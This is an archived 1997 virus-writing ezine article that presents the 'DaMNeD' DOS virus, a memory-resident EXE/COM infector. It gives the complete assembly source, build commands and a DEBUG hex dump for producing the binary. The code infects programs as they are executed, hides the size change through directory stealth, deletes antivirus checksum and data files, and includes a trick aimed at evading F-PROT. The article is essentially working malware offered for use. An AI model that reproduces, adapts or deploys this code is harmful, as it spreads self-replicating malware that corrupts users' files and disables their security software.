Copy Link
Add to Bookmark
Report

SLAM3.003: Resident semi-stealth EXE/COM infector ] DaMNeD [ by DC [SLAM]

eZine's profile picture
Published in 
Slam
 · 2 years ago

] DaMNeD Virus [

This virus is a resident semi-stealth EXE/COM infector that infect of course, on execute. However, it will restore the time/date, kill some bad files, doesn't infect av's, intercept the interrupt 24, hide your size with dta/fcb directory stealth, and works very good under Windows 95, but in the MS-DOS windows the both directory stealth doesn't works :( I'm working for a Windows95/DOS Directory Stealth...


To compile:

 TASM /M DAMNED.ASM 
TLINK DAMNED.OBJ
EXE2BIN DAMNED.OBJ DAMNED.COM


Delete other files:

 DEL DAMNED.OBJ 
DEL DAMNED.MAP


.

.model tiny 
.code
jumps ; for long jumps
org 0

start: call get_delta ; get delta-offs
get_delta:
mov di,sp
mov ax,ss:[di]
mov bp,ax
sub bp,offset get_delta

push es ; save es
push ds ; save ds

mov ah,0bh ; residency check
mov bx,"SL" ;
mov cx,"AM" ; SLAM here?
int 21h

cmp ax,"OK" ; yepz
je return_file ; return from original file...

push es ; save es

mov ax,3521h ; get adress of interrupt 21
int 21h

mov word ptr cs:[i21][bp],bx ; save it
mov word ptr cs:[i21][bp][2],es

pop es ; restore es

mov ah,4ah ; routine to make resident
mov bx,-1
int 21h

sub bx,(v_size+15)/16+1
mov ah,4ah
int 21h

mov bx,(v_size+15)/16
nop
mov ah,48h
int 21h

mov es,ax

push es
pop ax
dec ax ; This routine is only for F-PROT
push ax ; cannot detect this virus a new
pop ds ; variant of CHILL! B)

xor di,di
mov ax,"Z"
mov word ptr ds:[di+0],ax
sub ax,"Z" ; AX="Z" sub AX,"Z" AX=0
add ax,0008 ; ADD AX,8 AX=8
mov word ptr ds:[di+1],ax ; Mark DOS Block

push cs ; CS=DS
pop ds

mov si,bp ; Si=OFFSET OF START
mov cx,v_size
rep movsb ; move virus

push es
pop ds

lea dx,int21 ; put resident!
mov ax,2125h
xchg ah,al
int 21h

return_file:
pop ds ; restore original
pop es ; DS and ES

cmp cs:[com_exe][bp],1 ; It's a COM or EXE file?
je return_exe ; If EXE jump to exe return

return_com:
lea si,saved_bytes+bp ; si = saved bytes
mov cx,200h
shr cx,2
shl cx,1
push cx
mov di,cx
mov cx,3
rep movsb ; move the bytes to CS:[100h]

pop cx
jmp cx ; return..

saved_bytes:

int 20h
nop

com_exe db ? ; com / exe ?

return_exe:

mov ax,es ; ax = PSP
add ax,10h ; ax = PSP+10h
add cs:[_cs+bp],ax ; save this address in CS:IP

cli
mov sp,word ptr cs:[_sp+bp] ; adjust SP
add ax,word ptr cs:[_ss+bp] ; adjust SS
mov ss,ax
sti

sub ax,ax ; zer0 regz!
sub dx,dx
xor bx,bx
sub cx,cx
xor di,di
sub si,si

db 0eah
_ip dw 00000h
_cs dw 00000h
_sp dw ?
_ss dw ?

int21:
pushf
xchg ah,al
cmp al,11h ; fcb find?
xchg ah,al
jz fcb_stealth
xchg ah,al
cmp al,12h ; fcb findnext?
xchg ah,al
jz fcb_stealth
cmp ah,4eh ; dta find?
jz dta_stealth
cmp ah,4fh ; dta findnext?
jz dta_stealth
push bx
mov bx,4b00h
cmp ax,bx ; execute?
pop bx
jz infect_file
cmp ah,0bh ; residency check?
jnz dos_1
cmp bx,"SL"
jnz dos_1
cmp cx,"AM"
jnz dos_1
mov ax,"OK" ; damned is here!
popf
iret

dos_1:
popf
dos:
db 0eah ; jmp to oldint21
i21 dd ?
ret

fcb_stealth:
push cs ; save code segment
call dos ; call int 21h
or al,al ; error?
jnz no_files ; yeah, return...

push ax bx es ; push some regs.

mov ah,51h ; get PSP
int 21h
mov es,bx
cmp bx,es:[16h] ; it's a good PSP?
jnz no_psp ; no??? return...

mov bx,dx
mov al,[bx] ; al = current drive
push ax
mov ah,2fh ; get DTA
int 21h
pop ax
inc al
jnz no_fix ; extended fcb?
add bx,7

no_fix:
mov al,byte ptr es:[bx+17h] ; get seconds field...
and al,1fh ; test for infection
cmp al,1dh ; infected?
jnz no_psp ; no? return...

hide_fsize:
sub word ptr es:[bx+1dh],v_size ; subtract v_size
; from filesize
no_psp:
pop es bx ax ; pop pushed regs...
no_files:
retf 2 ; return...

dta_stealth:
push cs ; save code segment
call dos ; call int 21h
jc no_files2 ; err? no files found

pushf ; save flags and
push ax bx es ; some regs.

mov ah,2fh ; get the DTA to es:bx
int 21h

mov ax,es:[bx+16h] ; get the time
and al,1fh ; unmask seconds
cmp al,1dh ; infected?
jnz not_inf ; no? return

hide: sub word ptr es:[bx+1ah],v_size ; subtract the vsize
; from filesize
not_inf:
pop es bx ax ; pop the pushed regs
popf ; restore flags...
no_files2:
retf 2

i24 dd ? ; original int24
buffer db 6 dup("SLAM") ; buffer = 6 * 4 bytes "SLAM"
f_size dd ? ; buffer = 24(dec) 18(hex)
f_name dd ?
time dw ?
date dw ?
no_bad dw 8 ; number os bad files...
file db 13 dup (0)
bad db "ANTI-VIR.DAT",0 ; bad files...
db "CHKLIST.CPS",0
db "CHKLIST.MS",0
db "AVP.SET",0
db "FINDVIRU.DRV",0
db "AVP.OVL",0
db "SCAN.DAT",0
db "SIGN.DEF",0

infect_file:
push ax bx cx dx ds es di si ; push some regs...

mov word ptr cs:[f_name],dx ; save executed file
mov word ptr cs:[f_name][2],ds

call check_for_av ; check for av's...
jc exit_now ; don't infect...

mov ax,3524h ; get error handler.
int 21h

mov word ptr cs:[i24],bx ; save it
mov word ptr cs:[i24][2],es

mov ax,2425h ; put the new int24
push cs
pop ds
lea dx,error_handler
xchg al,ah
int 21h

mov dx,word ptr cs:[f_name] ; restore filename
mov ds,word ptr cs:[f_name][2]

mov ax,3D02h ; open it R/W acess
int 21h

mov bx,ax ; handle = AX = BX

push cs cs
pop es ds

mov ax,5700h ; get time
int 21h

mov word ptr cs:[time],cx
mov word ptr cs:[date],dx

and cl,1fh ; unmask secs.
cmp cl,1dh ; infected?!?!
je close_exit ; hmmm, next...

mov ax,3f00h ; read file...
lea dx,buffer
mov cx,18h ; 18h bytes (24 dec)
int 21h

mov ax,4202h ; go to -EOF-
mov cx,ax
sub cx,4202h
mov dx,cx
int 21h

mov word ptr cs:[f_size],ax ; save filesize
mov word ptr cs:[f_size][2],dx

mov cl,byte ptr buffer ; MZ signature check
add cl,byte ptr buffer+1
mov al,"M"
add al,"Z"
cmp al,cl
je infect_exe

mov ax,word ptr cs:[f_size] ; sub ax,3 ;)
sub ax,8
add ax,5
lea si,buffer ; save orig. bytes
lea di,saved_bytes
movsw
movsb

mov cl,0e9h ; cl = jump
mov byte ptr buffer,cl ; put the jmp
mov word ptr buffer+1,ax ; in the buffer
mov cs:[com_exe],0 ; mark! it's a com

mov ah,3fh ; write virus
lea dx,start
mov cx,v_size
inc ah
int 21h

mov ax,4200h ; go to -SOF-
mov cx,ax
sub cx,4200h
mov dx,cx
int 21h

mov ah,3fh ; write the header
lea dx,buffer ; (jump+large)
mov cx,3
inc ah ;
int 21h

close_exit:

mov ax,5700h ; write the new time
mov cx,word ptr cs:[time]
mov dx,word ptr cs:[date]
or cl,1dh
and cl,0fdh
inc al
int 21h
exit_close:
mov ax,3e00h ; close file
int 21h

lea si,bad ; bad files...
mov cx,cs:[no_bad] ; cx=number of files
ext:
lea di,file ; di=offset of file
fuck_av:
lodsb
cmp al,0
jz delete
stosb
jmp fuck_av

delete:
xor al,al
stosb

push cx

mov ax,4300h ; set attribs...
inc al
xor cx,cx
lea dx,file
int 21h

mov ah,41h ; delete bad file...
lea dx,file
int 21h

pop cx
loop ext

mov ax,2425h ; restore the new i24
mov dx,word ptr cs:[i24] ; handler
mov ds,word ptr cs:[i24][2]
xchg ah,al
int 21h

exit_now:
pop si di es ds dx cx bx ax

jmp dos_1

db 0
db "DaMNeD Virus (c) 1997, Dark Chakal [SLAM]"
db 0

infect_exe:
cmp word ptr buffer+18h,"@" ; it's a WiNEXE?
jz exit_close ; yepz!

cmp word ptr buffer+12h,"DC" ; second infection
jz exit_close ; marker...

mov ax,word ptr cs:[f_size] ; restore f_size
mov dx,word ptr cs:[f_size][2]

mov cx,word ptr [buffer+14h] ; save CS:IP
mov cs:[_ip],cx
mov cx,word ptr [buffer+16h]
mov cs:[_cs],cx
mov cx,word ptr [buffer+10h] ; save SS:SP
mov cs:[_sp],cx
mov cx,word ptr [buffer+0eh]
mov cs:[_ss],cx

mov cx,word ptr [buffer+8] ; convert header size
shl cx,4 ; to paragrafs...
sub ax,cx ; sub from filesize
sbb dx,0

mov cx,10h ; divide by paragrafs...
div cx

mov word ptr [buffer+14h],dx ; put the new IP
mov word ptr [buffer+16h],ax ; put the new CS
mov word ptr [buffer+12h],"DC" ; put the inf. mark.
; Dark Chakal ;)

mov ax,word ptr cs:[f_size] ; restore filesize
mov dx,word ptr cs:[f_size][2]
add ax,v_size ; ax=filesize+v_size
adc dx,0

mov cx,200h ; divide by pages
div cx

or dx,dx ; it's same page?
jz none ; yepz, no increment
inc ax
none:
mov word ptr [buffer+2],dx ; save it
mov word ptr [buffer+4],ax

mov cs:[com_exe],1 ; mark! it's a exe file

mov ah,3fh ; write virus
lea dx,start
mov cx,v_size
inc ah
int 21h

mov ax,4200h ; go to -SOF-
mov cx,ax
sub cx,ax
mov dx,cx
int 21h

mov ah,3fh ; write buffer (header)
lea dx,buffer
mov cx,18h
inc ah
int 21h

jmp close_exit


check_for_av:
mov si,dx
check_av:
lodsb
cmp al,"."
jnz check_av
lodsw
cmp ax,"XE"
jnz good
lodsb
cmp ax,"E"
jnz good
sub si,6
lodsw
cmp ax,"VA"
jz av_found
sub si,2
lodsw
cmp ax,"NA"
jz av_found
sub si,2
lodsw
cmp ax,"OT"
jz av_found

good: clc
ret
av_found:
stc
ret

error_handler:
mov al,3
iret


v_size equ $-start

end start

====That's for everyone without a assembler=================================

N DAMNED.COM
E 0100 E8 00 00 8B FC 36 8B 05 8B E8 81 ED 03 00 06 1E
E 0110 B4 0B BB 4C 53 B9 4D 41 CD 21 3D 4B 4F 74 53 06
E 0120 B8 21 35 CD 21 2E 89 9E 04 01 2E 8C 86 06 01 07
E 0130 B4 4A BB FF FF CD 21 83 EB 46 B4 4A CD 21 BB 45
E 0140 00 90 B4 48 CD 21 8E C0 06 58 48 50 1F 33 FF B8
E 0150 5A 00 89 05 2D 5A 00 05 08 00 89 45 01 0E 1F 8B
E 0160 F5 B9 45 04 F3 A4 06 1F BA C5 00 B8 25 21 86 E0
E 0170 CD 21 1F 07 2E 80 BE 97 00 01 74 1C 8D B6 94 00
E 0180 B9 00 02 D1 E9 D1 E9 D1 E1 51 8B F9 B9 03 00 F3
E 0190 A4 59 FF E1 CD 20 90 00 8C C0 05 10 00 2E 01 86
E 01A0 BF 00 FA 2E 8B A6 C1 00 2E 03 86 C3 00 8E D0 FB
E 01B0 2B C0 2B D2 33 DB 2B C9 33 FF 2B F6 EA 00 00 00
E 01C0 00 00 00 00 00 9C 86 E0 3C 11 86 E0 74 3B 86 E0
E 01D0 3C 12 86 E0 74 33 80 FC 4E 74 6D 80 FC 4F 74 68
E 01E0 53 BB 00 4B 3B C3 5B 75 03 E9 0B 01 80 FC 0B 75
E 01F0 11 81 FB 4C 53 75 0B 81 F9 4D 41 75 05 B8 4B 4F
E 0200 9D CF 9D EA 00 00 00 00 C3 0E E8 F6 FF 0A C0 75
E 0210 34 50 53 06 B4 51 CD 21 8E C3 26 3B 1E 16 00 75
E 0220 21 8B DA 8A 07 50 B4 2F CD 21 58 FE C0 75 03 83
E 0230 C3 07 26 8A 47 17 24 1F 3C 1D 75 06 26 81 6F 1D
E 0240 45 04 07 5B 58 CA 02 00 0E E8 B7 FF 72 1C 9C 50
E 0250 53 06 B4 2F CD 21 26 8B 47 16 24 1F 3C 1D 75 06
E 0260 26 81 6F 1A 45 04 07 5B 58 9D CA 02 00 00 00 00
E 0270 00 53 4C 41 4D 53 4C 41 4D 53 4C 41 4D 53 4C 41
E 0280 4D 53 4C 41 4D 53 4C 41 4D 00 00 00 00 00 00 00
E 0290 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00
E 02A0 00 00 00 00 41 4E 54 49 2D 56 49 52 2E 44 41 54
E 02B0 00 43 48 4B 4C 49 53 54 2E 43 50 53 00 43 48 4B
E 02C0 4C 49 53 54 2E 4D 53 00 41 56 50 2E 53 45 54 00
E 02D0 46 49 4E 44 56 49 52 55 2E 44 52 56 00 41 56 50
E 02E0 2E 4F 56 4C 00 53 43 41 4E 2E 44 41 54 00 53 49
E 02F0 47 4E 2E 44 45 46 00 50 53 51 52 1E 06 57 56 2E
E 0300 89 16 8D 01 2E 8C 1E 8F 01 E8 04 02 73 03 E9 1B
E 0310 01 B8 24 35 CD 21 2E 89 1E 6D 01 2E 8C 06 6F 01
E 0320 B8 25 24 0E 1F BA 42 04 86 C4 CD 21 2E 8B 16 8D
E 0330 01 2E 8E 1E 8F 01 B8 02 3D CD 21 8B D8 0E 0E 07
E 0340 1F B8 00 57 CD 21 2E 89 0E 91 01 2E 89 16 93 01
E 0350 80 E1 1F 80 F9 1D 74 7A B8 00 3F BA 71 01 B9 18
E 0360 00 CD 21 B8 02 42 8B C8 81 E9 02 42 8B D1 CD 21
E 0370 2E A3 89 01 2E 89 16 8B 01 8A 0E 71 01 02 0E 72
E 0380 01 B0 4D 04 5A 3A C1 75 03 E9 D6 00 2E A1 89 01
E 0390 2D 08 00 05 05 00 BE 71 01 BF 94 00 A5 A4 B1 E9
E 03A0 88 0E 71 01 A3 72 01 2E C6 06 97 00 00 B4 3F BA
E 03B0 00 00 B9 45 04 FE C4 CD 21 B8 00 42 8B C8 81 E9
E 03C0 00 42 8B D1 CD 21 B4 3F BA 71 01 B9 03 00 FE C4
E 03D0 CD 21 B8 00 57 2E 8B 0E 91 01 2E 8B 16 93 01 80
E 03E0 C9 1D 80 E1 FD FE C0 CD 21 B8 00 3E CD 21 BE A4
E 03F0 01 2E 8B 0E 95 01 BF 97 01 AC 3C 00 74 03 AA EB
E 0400 F8 32 C0 AA 51 B8 00 43 FE C0 33 C9 BA 97 01 CD
E 0410 21 B4 41 BA 97 01 CD 21 59 E2 DB B8 25 24 2E 8B
E 0420 16 6D 01 2E 8E 1E 6F 01 86 E0 CD 21 5E 5F 07 1F
E 0430 5A 59 5B 58 E9 CB FD 00 44 61 4D 4E 65 44 20 56
E 0440 69 72 75 73 20 28 63 29 20 31 39 39 37 2C 20 44
E 0450 61 72 6B 20 43 68 61 6B 61 6C 20 5B 53 4C 41 4D
E 0460 5D 00 83 3E 89 01 40 74 80 81 3E 83 01 43 44 75
E 0470 03 E9 75 FF 2E A1 89 01 2E 8B 16 8B 01 8B 0E 85
E 0480 01 2E 89 0E BD 00 8B 0E 87 01 2E 89 0E BF 00 8B
E 0490 0E 81 01 2E 89 0E C1 00 8B 0E 7F 01 2E 89 0E C3
E 04A0 00 8B 0E 79 01 D1 E1 D1 E1 D1 E1 D1 E1 2B C1 83
E 04B0 DA 00 B9 10 00 F7 F1 89 16 85 01 A3 87 01 C7 06
E 04C0 83 01 43 44 2E A1 89 01 2E 8B 16 8B 01 05 45 04
E 04D0 83 D2 00 B9 00 02 F7 F1 0B D2 74 01 40 89 16 73
E 04E0 01 A3 75 01 2E C6 06 97 00 01 B4 3F BA 00 00 B9
E 04F0 45 04 FE C4 CD 21 B8 00 42 8B C8 2B C8 8B D1 CD
E 0500 21 B4 3F BA 71 01 B9 18 00 FE C4 CD 21 E9 C2 FE
E 0510 8B F2 AC 3C 2E 75 FB AD 3D 45 58 75 21 AC 3D 45
E 0520 00 75 1B 83 EE 06 AD 3D 41 56 74 14 83 EE 02 AD
E 0530 3D 41 4E 74 0B 83 EE 02 AD 3D 54 4F 74 02 F8 C3
E 0540 F9 C3 B0 03 CF
RCX
0445
W
Q

===========================================================================

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT